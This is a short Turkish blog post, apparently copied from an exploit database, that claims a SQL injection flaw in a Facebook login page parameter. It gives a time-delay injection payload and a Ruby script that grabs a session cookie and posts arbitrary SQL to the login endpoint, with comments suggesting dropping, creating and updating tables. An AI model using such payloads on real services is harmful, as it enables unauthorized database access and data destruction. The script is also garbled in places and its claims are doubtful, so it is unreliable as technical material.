Facebook sitesinin login.php sayfasında sql açığı bulunduğu tespit edilmiştir. Bu açık ile ilgili bilgiler aşağıda verilmiştir.
# SQL Injection # Path Sensitive : https://login.facebook.com/login.php?login_attempt=1 # Fault Find By Gsk | Whivack # Code By, Gsk | Whivack # Variable POST Sensitive : lsd # Thanks Team Guru-Security-Klan (gsk2.fr) and Inj3ct0r.com (Exploit Database) by r0073r # Contact Me : whivackwdcompany@gmail.com (French) # Useful Software : Ruby 1.8.6 # Download Ruby 1.8.6 : http://www.ruby-lang.org # Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B-- # Result Command :Bu açık ile ilgili ruby kodu aşağıdadır.
require 'net/http' require 'net/https' http = Net::HTTP.new('login.facebook.com', 443) http.use_ssl = true path = '/login.php' resp, data = http.get(path, nil) cookie = resp.response['set-cookie'] # DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ... data = "lsd=%27[SQL Instruction]--" headers = { ? 'Cookie' => cookie, ? 'Referer' => 'https://login.facebook.com/login.php', ? 'Content-Type' => 'application/x-www-form-urlencoded' } resp, data = http.post(path, data, headers) puts 'Code = ' + resp.code
0 yorum:
Yorum Gönder